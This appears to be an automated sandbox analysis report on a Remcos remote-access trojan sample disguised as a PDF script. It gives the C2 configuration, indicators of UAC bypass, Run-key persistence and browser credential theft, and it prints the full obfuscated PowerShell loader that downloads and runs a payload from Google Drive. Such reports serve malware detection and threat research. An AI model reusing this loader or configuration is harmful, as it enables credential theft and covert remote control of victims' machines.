remcos | 05f8fb9335954bb1069a2dd6dbbf5ba8c605e3923c3ed0c974f95cd62fd10b67

Analysis

max time kernel
298s
max time network
279s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02/12/2024, 10:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

328835_140264_1·pdf.vbs
Size

33KB
MD5

a9636ba5124550a3c145fef91fa5489d
SHA1

f3ab90b16fef6a323c1a4eb44aa47acecdac3ca6
SHA256

146882bf4a0d47c6db66dacbc5e283a85097a8320cf653641d380ebeab6c4c10
SHA512

9b004cbdd4d35d7dd7038efd8e002b7022e1e6e9c3207535934f362c8e3a45e23ebe87ec1de5f7c37ff8f6afdbe7fc5deb5baa56957ba365abc8dae8a7fce7fa
SSDEEP

768:+fZasQ6lMFJfJc4PCPPNngWWshZBTYRikWbVVw4OrxBX:eZasOFfXiPeWWs/BYse4OXX

Score

10^/10

remcos remotehost collection credential_access discovery evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

8766e34g8.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-93TSMD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1960-86-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4240-92-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2956-85-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1960-86-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2956-85-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

flow	pid	Process
3	1916	WScript.exe
9	4644	powershell.exe
11	4644	powershell.exe
27	3460	msiexec.exe
29	3460	msiexec.exe
31	3460	msiexec.exe
33	3460	msiexec.exe
34	3460	msiexec.exe
49	3460	msiexec.exe
50	3460	msiexec.exe
51	3460	msiexec.exe
52	3460	msiexec.exe
54	3460	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3584	Chrome.exe
2780	msedge.exe
3088	msedge.exe
1248	Chrome.exe
1240	Chrome.exe
1236	Chrome.exe
3700	msedge.exe
208	msedge.exe
3632	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Milliammetres% -windowstyle 1 $Chevise=(gp -Path 'HKCU:\\Software\\Scarfpins\\').Hospitious24;%Milliammetres% ($Chevise)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4644	powershell.exe
4972	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
9	drive.google.com
27	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3460	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4972	powershell.exe
3460	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3460 set thread context of 2956	3460	msiexec.exe	104
PID 3460 set thread context of 1960	3460	msiexec.exe	107
PID 3460 set thread context of 4240	3460	msiexec.exe	109

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2116	reg.exe
2984	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4644	powershell.exe
4644	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
2956	msiexec.exe
2956	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
4240	msiexec.exe
4240	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
2956	msiexec.exe
2956	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
1248	Chrome.exe
1248	Chrome.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe

Suspicious behavior: MapViewOfSection 7 IoCs

pid	Process
4972	powershell.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe
3460	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3700	msedge.exe
3700	msedge.exe
3700	msedge.exe
3700	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	4240	msiexec.exe
Token: SeShutdownPrivilege	1248	Chrome.exe
Token: SeCreatePagefilePrivilege	1248	Chrome.exe
Token: SeShutdownPrivilege	1248	Chrome.exe
Token: SeCreatePagefilePrivilege	1248	Chrome.exe
Token: SeShutdownPrivilege	1248	Chrome.exe
Token: SeCreatePagefilePrivilege	1248	Chrome.exe
Token: SeShutdownPrivilege	1248	Chrome.exe
Token: SeCreatePagefilePrivilege	1248	Chrome.exe
Token: SeShutdownPrivilege	1248	Chrome.exe
Token: SeCreatePagefilePrivilege	1248	Chrome.exe
Token: SeShutdownPrivilege	1248	Chrome.exe
Token: SeCreatePagefilePrivilege	1248	Chrome.exe
Token: SeShutdownPrivilege	1248	Chrome.exe
Token: SeCreatePagefilePrivilege	1248	Chrome.exe
Token: SeShutdownPrivilege	1248	Chrome.exe
Token: SeCreatePagefilePrivilege	1248	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1248	Chrome.exe
3700	msedge.exe
3700	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3460	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1916 wrote to memory of 4644	1916	WScript.exe	82
PID 1916 wrote to memory of 4644	1916	WScript.exe	82
PID 4972 wrote to memory of 3460	4972	powershell.exe	93
PID 4972 wrote to memory of 3460	4972	powershell.exe	93
PID 4972 wrote to memory of 3460	4972	powershell.exe	93
PID 4972 wrote to memory of 3460	4972	powershell.exe	93
PID 3460 wrote to memory of 1064	3460	msiexec.exe	94
PID 3460 wrote to memory of 1064	3460	msiexec.exe	94
PID 3460 wrote to memory of 1064	3460	msiexec.exe	94
PID 1064 wrote to memory of 2116	1064	cmd.exe	96
PID 1064 wrote to memory of 2116	1064	cmd.exe	96
PID 1064 wrote to memory of 2116	1064	cmd.exe	96
PID 3460 wrote to memory of 756	3460	msiexec.exe	98
PID 3460 wrote to memory of 756	3460	msiexec.exe	98
PID 3460 wrote to memory of 756	3460	msiexec.exe	98
PID 756 wrote to memory of 2984	756	cmd.exe	100
PID 756 wrote to memory of 2984	756	cmd.exe	100
PID 756 wrote to memory of 2984	756	cmd.exe	100
PID 3460 wrote to memory of 1248	3460	msiexec.exe	102
PID 3460 wrote to memory of 1248	3460	msiexec.exe	102
PID 1248 wrote to memory of 4388	1248	Chrome.exe	103
PID 1248 wrote to memory of 4388	1248	Chrome.exe	103
PID 3460 wrote to memory of 2956	3460	msiexec.exe	104
PID 3460 wrote to memory of 2956	3460	msiexec.exe	104
PID 3460 wrote to memory of 2956	3460	msiexec.exe	104
PID 3460 wrote to memory of 2956	3460	msiexec.exe	104
PID 3460 wrote to memory of 4752	3460	msiexec.exe	105
PID 3460 wrote to memory of 4752	3460	msiexec.exe	105
PID 3460 wrote to memory of 4752	3460	msiexec.exe	105
PID 3460 wrote to memory of 1292	3460	msiexec.exe	106
PID 3460 wrote to memory of 1292	3460	msiexec.exe	106
PID 3460 wrote to memory of 1292	3460	msiexec.exe	106
PID 3460 wrote to memory of 1960	3460	msiexec.exe	107
PID 3460 wrote to memory of 1960	3460	msiexec.exe	107
PID 3460 wrote to memory of 1960	3460	msiexec.exe	107
PID 3460 wrote to memory of 1960	3460	msiexec.exe	107
PID 3460 wrote to memory of 4440	3460	msiexec.exe	108
PID 3460 wrote to memory of 4440	3460	msiexec.exe	108
PID 3460 wrote to memory of 4440	3460	msiexec.exe	108
PID 3460 wrote to memory of 4240	3460	msiexec.exe	109
PID 3460 wrote to memory of 4240	3460	msiexec.exe	109
PID 3460 wrote to memory of 4240	3460	msiexec.exe	109
PID 3460 wrote to memory of 4240	3460	msiexec.exe	109
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110
PID 1248 wrote to memory of 4464	1248	Chrome.exe	110

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\328835_140264_1·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Holbrook='Baalpladserne160';;$Peptonise='Kileskriften';;$Scenarioteknikken210='Deponerendes65';;$Aktieavancebeskatningerne='Bibabudukke';;$Oenanthylate=$host.Name;function Stainer($Cubitopalmar){If ($Oenanthylate) {$setout=4} for ($Standishes=$setout;;$Standishes+=5){if(!$Cubitopalmar[$Standishes]) { break };$Snappende+=$Cubitopalmar[$Standishes];$Ungdommens='Islandman140'}$Snappende}function Anholdelsens($Subdruid){ .($Udslyngning) ($Subdruid)}$Conakry=Stainer 'UncaNUnbueSc rT Tor. enW';$Conakry+=Stainer 'El,eEFirmb MarCLeonlChurIT,xiePepsN GulT';$Trykkested=Stainer 'P tuM SproE hizSpa i Fe l rgalVo,ta,reo/';$Siouxs=Stainer 'QereT Hj lBinosUntw1Wars2';$Rrggets='Od.o[ FrenEkebePrinTS.ag.OverSSlv eToolrBankv ispiOpl CPhraeL unP neuoInt iVatenBad.TLuf.M CitaStogn SubaSemigCh peSan RUnfo]Re,u:Is.g:Sp eS SobES emC SaluW serTe pI tvlTBag,Y onspCurtr,deroGullT esuO My.CFo.fOBygglSubt=Urim$ lassForsI Tr.oDo buGrovx fors';$Trykkested+=Stainer ' .re5Mrkh.Gold0De,i Atte(CompWUngpiRhumn vedRekooSkulwSponsSign OprrNPeleT Dra sluf1 Col0 aro.Bri 0A ti;e vi ,kydWGingiGarnnB un6Arbe4Jet.; Bla Pol xMate6Embr4Paho; nt Ur,srgalav Ran:Nonp1Fa i3Sa t1Harb.Ch o0 ata)Pust lecGCi,neMicrc BrakDepoo ear/Past2belt0Slsk1Hil 0Tran0Vand1Aggr0 Hit1S il SvejF acci itsrDiskeGridfUnwooTel xskra/Flea1Ster3Fiss1Undl.Skov0';$Standishesntonationer166=Stainer 'kn gUKvinsOmkoEElecRopma-bygnaNonug O tEHyp nConst';$Chemurgically=Stainer 'garth.evitSupetOmn pIntesDagp:Tran/ arr/Halsd L grBa li adivUnlie Acc. TaxgKantoMoisoIsatgMolelKakie Pre.Hallc alroAccom Zoo/ Sucu A ac Cat?GruneWintxClubpharmoClo rFordt F.s=Nonmdglado DiawFinenspatl,ndeoRadiaDecad plf&TilsiShindalm =Proc1Foto-Del VSprusTaliW Funjve,t8NonaRFla mUnm,bvoluHS.lbmCalvD HemMthttETrayA ra- Be O StaS ngyl,lasMKongb erm7Ch r8UbrugB.haBKlnilRedeWWinzZSp.oK ortCInstQ Sera';$Undubiousness=Stainer ' Sup>';$Udslyngning=Stainer ' FasiannoeB rdX';$overhringernes='Opsummeret';$situates='\Svrmens.Jag';Anholdelsens (Stainer 'Alme$ElemgRvr,L Pe o DowbkronABlokLRege:Incot jaleAppeRStormEmbaaLaboGChama dapNOve,TCupe=Sttt$ oneELandnSpi,V jvn: roeAGo,sPBystP Hy.dNurlAAutotInfaARamb+Brai$SamlSBulgiOpveTPremu AfsAsatiTMecheLam.S');Anholdelsens (Stainer 'Okta$La.rGUtaaL ,ulO SmebWannaKirkL Pe : disaaasmFFerrTMi.aEBlgerForfDBedmeSkaaaTagvtForkhRkeb=Unop$RappC A tH DenETa km subU LanRa.rogAlabIAltrCProfAKeralArg LBry,y Alt.Monos Ep,pKapplBombIB liTReb ( uc$ trauCastNBlandUbevU TilbInteIF nwO DgnUTennsHumbNSanseQuadskemiSKate)');Anholdelsens (Stainer $Rrggets);$Chemurgically=$Afterdeath[0];$Disorganize=(Stainer 'Deb $FrelgHulklA tiOSkytb KotaGeoeL Mut:CalaFMinei,haggCon.UhindrJol.a ,ngNAviaTQuodeMidtrPr.nnMateEShebs Tud=J,ggnHat.eKompwUd.y-D saoA tebMargJSk leLuftcHosptIc n rtesBr,cY.orksMicrTOrieePerfM,rbe.Rets$T.eacT ikoBetjnM,ssaBa,kk StarVuptY');Anholdelsens ($Disorganize);Anholdelsens (Stainer 'Dose$StosfJouri vingFretuSydar rbiaNuttnB wet Un.eRavirTelenHilleDyr,sStre.Mi lHOvereUnpraXyledSki,eG nor rmrs Und[Tesk$IlluSnsthteguea tann TindMuniiC,yps TrahGurieHardsPlo n A.tt Eiko Baan ryaz,brtUtaaiR froConsnBlaceUnmirBo r1 id6Serp6 en]P,ne=Alic$Kem TKinerBladyF.jekUn rk SkieGruns,niotSubseCompd');$Barrerne=Stainer 'En.o$TantfMonoi ribgXantuprocrEfteaBrnenHougt deeeUhusr Tw nFiksedecisGy o.StavDSkumoBogsw ArenAp.rl tomo laaA sedDrnnFPimpiTil lHnepe Dre(Undi$ redC .aphGulaeIndmmPdiauO tpr Ridg HaeiSin cReleaLa nl H plFireyBhut,Lang$p aeS O ek I dySh itPlant Gr,eWamplLnsle F lnInfu)';$Skyttelen=$Termagant;Anholdelsens (Stainer 'Land$ maggNynnl DatOPer.BFedeASphilMand:B syi ArgDAlcoeSi,ekAgeraForbTUv,daAdopLKiggOHydrG,ntieUnd,R PronNe.fESc lsHoli=pola(AcipTBro.Eov rsIndsTMid,- Va,P StraPrlatHerohAppl Moni$VitiSBuxoKC muy PertDryptOplgeDirkL Sh eOut n .as)');while (!$Idekatalogernes) {Anholdelsens (Stainer 'Eleg$Sherg KaplFr io Ep bVideaSynslhv d:MallKFremaid opFasti Bl t CriaRan,lKompeLaven UngsRapi= Qui$InveF cy oS ilrHuleePleupPrepif,leeCouncbuste') ;Anholdelsens $Barrerne;Anholdelsens (Stainer 'OffssBradT borA fi rGlistR ts-s avSBlodl udge hinEP laPBrid Husd4');Anholdelsens (Stainer 'Unst$ S,hg I nLTrigOPyrrB PunaUdlnlAfgr: elsiDauddgavleMagnk ianaUnivTa,deaPostLUnd,oskinG TekE Pi.rnonpnLastE U,psUdd,= S r(Ple.TKiloERejeSYdeltAute- OvepWooda,asatSme.H For Budg$HalsSFl xk forYTublt vrit SinEFornLM zzePorcnThre)') ;Anholdelsens (Stainer 'Bode$OriegSandlGtebO S abFuscASognlGe n: m rBPlauRHelliU.isD ParaHarrlCon LVilkyMund= Urd$FondgNiddlThyroGennbDingaSotelHor :EnerTRemaa Trarb.caMAvgue symnPork+Pure+Repe% Sph$FugeAErnrfVerot .riecarrRAmatDrumoE,preAMopetPlayh So .,angcOpgaOStoru UdsNKa at') ;$Chemurgically=$Afterdeath[$Bridally]}$Amenance=331516;$Overhunt=31171;Anholdelsens (Stainer 'Desa$ElmiGMoneL KrooSka b DyrAE itLcave: ourhte poVisiuGangpP,ste oolTimeA UndN ChadSpliETrun Flay=Admi Dit,G ,ore PleTSmit-Sve cArraOAnlgnUdvktretseU deNunpatStru Halm$KoloSBeblk nkuYBranTfingt rolE Sh lGingEDainn');Anholdelsens (Stainer 'Bo i$Ul,gg,krulAfveoEnerb B ra asal The:Ch rD acre upel ivkUnderRkene .akdWh.aeDiplr ndeeLouekFor,o Bi.nJ sktS.raoBygn afst= Sta lad[AfspSAfviyRespsSkostPrtee Na mPre .BadeC Daao artnSagsvBerteEcclr Uddt Tre]Tiaa:Grom:PomeFsmitr Volo affmAn iBm,rta strsBog.eMask6.taa4ButaSPrect tjerSam iBulknD shgtung(Lall$ erHNo foValguFi.mpCo,deOverlM laaPeltn KahdPaate.nim)');Anholdelsens (Stainer 'nonr$amfog Hy lOpspo RodBBjeraPretlUnif:K ipi lasnSpastBarlrUdkoO ,enJBor,e Op CTranTBifaESalodHypn eme= ar tar[KorsS G yy RenSLillTIhphe BodmB,id.UdputNo iEJetmX,ndeTRemb.ForhEBolsN MinCCarro omgdUdprIFyrinGa dGNett]Skri:Tll : prea ReeSDortc FjtISkimi Het.Pewtg TraEAvantPhotsDe iTpr,lR TusiTeneNTwadgFaun(Mari$resudKvasESpirL bsKClydrKrvoe ankdTradE,nliRDiabeSektKRgn.OXenoNBiciTPa oOExud)');Anholdelsens (Stainer ' pre$Hel gM teLBe.hoBegabNebrAOrchLAbu.: rkpu P,eNVianfMineAFai.M OceIa maLYawpiIse AdislRSkabL OrdYEle.=univ$InseiViziNWortTMenuRRaveOQ,eajAnnoE kogc SpaTLinee PaaDBtte. aanSKundUPardbMe asRhe Ts udrPalaINeosn htaG N n(Prof$Du dA R lm releErytN nadA SurNPol,CDeteeSt c,Clou$ WomoMonivweinE,nakRObskHFa eUpid.n Ch,tTale)');Anholdelsens $Unfamiliarly;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Holbrook='Baalpladserne160';;$Peptonise='Kileskriften';;$Scenarioteknikken210='Deponerendes65';;$Aktieavancebeskatningerne='Bibabudukke';;$Oenanthylate=$host.Name;function Stainer($Cubitopalmar){If ($Oenanthylate) {$setout=4} for ($Standishes=$setout;;$Standishes+=5){if(!$Cubitopalmar[$Standishes]) { break };$Snappende+=$Cubitopalmar[$Standishes];$Ungdommens='Islandman140'}$Snappende}function Anholdelsens($Subdruid){ .($Udslyngning) ($Subdruid)}$Conakry=Stainer 'UncaNUnbueSc rT Tor. enW';$Conakry+=Stainer 'El,eEFirmb MarCLeonlChurIT,xiePepsN GulT';$Trykkested=Stainer 'P tuM SproE hizSpa i Fe l rgalVo,ta,reo/';$Siouxs=Stainer 'QereT Hj lBinosUntw1Wars2';$Rrggets='Od.o[ FrenEkebePrinTS.ag.OverSSlv eToolrBankv ispiOpl CPhraeL unP neuoInt iVatenBad.TLuf.M CitaStogn SubaSemigCh peSan RUnfo]Re,u:Is.g:Sp eS SobES emC SaluW serTe pI tvlTBag,Y onspCurtr,deroGullT esuO My.CFo.fOBygglSubt=Urim$ lassForsI Tr.oDo buGrovx fors';$Trykkested+=Stainer ' .re5Mrkh.Gold0De,i Atte(CompWUngpiRhumn vedRekooSkulwSponsSign OprrNPeleT Dra sluf1 Col0 aro.Bri 0A ti;e vi ,kydWGingiGarnnB un6Arbe4Jet.; Bla Pol xMate6Embr4Paho; nt Ur,srgalav Ran:Nonp1Fa i3Sa t1Harb.Ch o0 ata)Pust lecGCi,neMicrc BrakDepoo ear/Past2belt0Slsk1Hil 0Tran0Vand1Aggr0 Hit1S il SvejF acci itsrDiskeGridfUnwooTel xskra/Flea1Ster3Fiss1Undl.Skov0';$Standishesntonationer166=Stainer 'kn gUKvinsOmkoEElecRopma-bygnaNonug O tEHyp nConst';$Chemurgically=Stainer 'garth.evitSupetOmn pIntesDagp:Tran/ arr/Halsd L grBa li adivUnlie Acc. TaxgKantoMoisoIsatgMolelKakie Pre.Hallc alroAccom Zoo/ Sucu A ac Cat?GruneWintxClubpharmoClo rFordt F.s=Nonmdglado DiawFinenspatl,ndeoRadiaDecad plf&TilsiShindalm =Proc1Foto-Del VSprusTaliW Funjve,t8NonaRFla mUnm,bvoluHS.lbmCalvD HemMthttETrayA ra- Be O StaS ngyl,lasMKongb erm7Ch r8UbrugB.haBKlnilRedeWWinzZSp.oK ortCInstQ Sera';$Undubiousness=Stainer ' Sup>';$Udslyngning=Stainer ' FasiannoeB rdX';$overhringernes='Opsummeret';$situates='\Svrmens.Jag';Anholdelsens (Stainer 'Alme$ElemgRvr,L Pe o DowbkronABlokLRege:Incot jaleAppeRStormEmbaaLaboGChama dapNOve,TCupe=Sttt$ oneELandnSpi,V jvn: roeAGo,sPBystP Hy.dNurlAAutotInfaARamb+Brai$SamlSBulgiOpveTPremu AfsAsatiTMecheLam.S');Anholdelsens (Stainer 'Okta$La.rGUtaaL ,ulO SmebWannaKirkL Pe : disaaasmFFerrTMi.aEBlgerForfDBedmeSkaaaTagvtForkhRkeb=Unop$RappC A tH DenETa km subU LanRa.rogAlabIAltrCProfAKeralArg LBry,y Alt.Monos Ep,pKapplBombIB liTReb ( uc$ trauCastNBlandUbevU TilbInteIF nwO DgnUTennsHumbNSanseQuadskemiSKate)');Anholdelsens (Stainer $Rrggets);$Chemurgically=$Afterdeath[0];$Disorganize=(Stainer 'Deb $FrelgHulklA tiOSkytb KotaGeoeL Mut:CalaFMinei,haggCon.UhindrJol.a ,ngNAviaTQuodeMidtrPr.nnMateEShebs Tud=J,ggnHat.eKompwUd.y-D saoA tebMargJSk leLuftcHosptIc n rtesBr,cY.orksMicrTOrieePerfM,rbe.Rets$T.eacT ikoBetjnM,ssaBa,kk StarVuptY');Anholdelsens ($Disorganize);Anholdelsens (Stainer 'Dose$StosfJouri vingFretuSydar rbiaNuttnB wet Un.eRavirTelenHilleDyr,sStre.Mi lHOvereUnpraXyledSki,eG nor rmrs Und[Tesk$IlluSnsthteguea tann TindMuniiC,yps TrahGurieHardsPlo n A.tt Eiko Baan ryaz,brtUtaaiR froConsnBlaceUnmirBo r1 id6Serp6 en]P,ne=Alic$Kem TKinerBladyF.jekUn rk SkieGruns,niotSubseCompd');$Barrerne=Stainer 'En.o$TantfMonoi ribgXantuprocrEfteaBrnenHougt deeeUhusr Tw nFiksedecisGy o.StavDSkumoBogsw ArenAp.rl tomo laaA sedDrnnFPimpiTil lHnepe Dre(Undi$ redC .aphGulaeIndmmPdiauO tpr Ridg HaeiSin cReleaLa nl H plFireyBhut,Lang$p aeS O ek I dySh itPlant Gr,eWamplLnsle F lnInfu)';$Skyttelen=$Termagant;Anholdelsens (Stainer 'Land$ maggNynnl DatOPer.BFedeASphilMand:B syi ArgDAlcoeSi,ekAgeraForbTUv,daAdopLKiggOHydrG,ntieUnd,R PronNe.fESc lsHoli=pola(AcipTBro.Eov rsIndsTMid,- Va,P StraPrlatHerohAppl Moni$VitiSBuxoKC muy PertDryptOplgeDirkL Sh eOut n .as)');while (!$Idekatalogernes) {Anholdelsens (Stainer 'Eleg$Sherg KaplFr io Ep bVideaSynslhv d:MallKFremaid opFasti Bl t CriaRan,lKompeLaven UngsRapi= Qui$InveF cy oS ilrHuleePleupPrepif,leeCouncbuste') ;Anholdelsens $Barrerne;Anholdelsens (Stainer 'OffssBradT borA fi rGlistR ts-s avSBlodl udge hinEP laPBrid Husd4');Anholdelsens (Stainer 'Unst$ S,hg I nLTrigOPyrrB PunaUdlnlAfgr: elsiDauddgavleMagnk ianaUnivTa,deaPostLUnd,oskinG TekE Pi.rnonpnLastE U,psUdd,= S r(Ple.TKiloERejeSYdeltAute- OvepWooda,asatSme.H For Budg$HalsSFl xk forYTublt vrit SinEFornLM zzePorcnThre)') ;Anholdelsens (Stainer 'Bode$OriegSandlGtebO S abFuscASognlGe n: m rBPlauRHelliU.isD ParaHarrlCon LVilkyMund= Urd$FondgNiddlThyroGennbDingaSotelHor :EnerTRemaa Trarb.caMAvgue symnPork+Pure+Repe% Sph$FugeAErnrfVerot .riecarrRAmatDrumoE,preAMopetPlayh So .,angcOpgaOStoru UdsNKa at') 